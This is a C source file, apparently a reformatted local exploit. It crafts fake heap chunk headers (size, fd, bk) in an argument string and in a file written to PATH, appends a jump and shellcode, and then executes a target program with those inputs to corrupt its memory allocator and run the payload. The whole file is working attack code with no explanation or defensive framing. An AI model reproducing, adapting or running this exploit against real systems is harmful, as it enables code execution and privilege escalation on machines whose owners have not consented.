
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int O_CREAT ;
 int O_EXCL ;
 int O_WRONLY ;
 char* PATH ;
 int S_IRWXU ;
 int close (int) ;
 int execve (char*,char**,int *) ;
 int fprintf (int ,char*,...) ;
 int open (char*,int,int ) ;
 char* shellcode ;
 int stderr ;
 int strcat (char*,char*) ;
 int strcpy (char*,char*) ;
 int strlen (char*) ;
 scalar_t__ strtoul (char*,int *,int ) ;
 int usage (char*) ;
 int write (int,char*,int) ;
 scalar_t__ zero (unsigned int) ;

int main( int argc, char * argv[] )
{
  unsigned int ui_realloc;
  unsigned int ui_malloc;
  char path[1337];
  char next[1337];
  char * execve_argv[] = { ((void*)0), "-d", PATH, next, ((void*)0) };
  int fd;
  unsigned int p_next;
  unsigned int ui;

  if ( argc != 4 ) {
    usage( argv[0] );
    return( -1 );
  }
  execve_argv[0] = argv[1];
  ui_realloc = (unsigned int)strtoul( argv[2], ((void*)0), 0 );
  ui_malloc = (unsigned int)strtoul( argv[3], ((void*)0), 0 );

  strcpy( next, "ppppssssffffbbbb" );
  p_next = (0xc0000000 - 4) - (strlen(execve_argv[0]) + 1) - (strlen(next) + 1);
  for ( ui = 0; ui < p_next - (p_next & ~3); ui++ ) {
    strcat( next, "X" );
  }
  p_next = (0xc0000000 - 4) - (strlen(execve_argv[0]) + 1) - (strlen(next) + 1);

  ui = 0;
  *((unsigned int *)(&(next[ui]))) = (unsigned int)(-1);

  ui += 4;
  *((unsigned int *)(&(next[ui]))) = ((ui_malloc - 8) + 136) - p_next;
  if ( zero( *((unsigned int *)(&(next[ui]))) ) ) {
    fprintf( stderr, "debug: next->size == 0x%08x;\n", *((unsigned int *)(&(next[ui]))) );
    return( -1 );
  }

  ui += 4;
  *((unsigned int *)(&(next[ui]))) = ui_realloc - 12;
  if ( zero( *((unsigned int *)(&(next[ui]))) ) ) {
    fprintf( stderr, "debug: next->fd == 0x%08x;\n", *((unsigned int *)(&(next[ui]))) );
    return( -1 );
  }

  ui += 4;
  *((unsigned int *)(&(next[ui]))) = ui_malloc;
  if ( zero( *((unsigned int *)(&(next[ui]))) ) ) {
    fprintf( stderr, "debug: next->bk == 0x%08x;\n", *((unsigned int *)(&(next[ui]))) );
    return( -1 );
  }

  ui = 0;
  path[ui] = (char)(256 - 4);

  ui += 1;
  *((unsigned int *)(&(path[ui]))) = p_next - (ui_malloc - 8);
  if ( zero( *((unsigned int *)(&(path[ui]))) ) ) {
    fprintf( stderr, "debug: oldp->size == 0x%08x;\n", *((unsigned int *)(&(path[ui]))) );
    return( -1 );
  }

  ui += 4;
  path[ui] = 0;
  strcat( path, "\xeb\x0axxyyyyzzzz" );
  strcat( path, shellcode );

  fd = open( PATH, O_WRONLY|O_CREAT|O_EXCL, S_IRWXU );
  if ( fd == -1 ) {
    fprintf( stderr, "debug: open( \"%s\", O_WRONLY|O_CREAT|O_EXCL, S_IRWXU ) == -1;\n", PATH );
    return( -1 );
  }
  write( fd, "0", sizeof("0") );
  write( fd, "", sizeof("") );
  write( fd, path, strlen(path) );
  close( fd );

  execve( execve_argv[0], execve_argv, ((void*)0) );
  return( -1 );
}
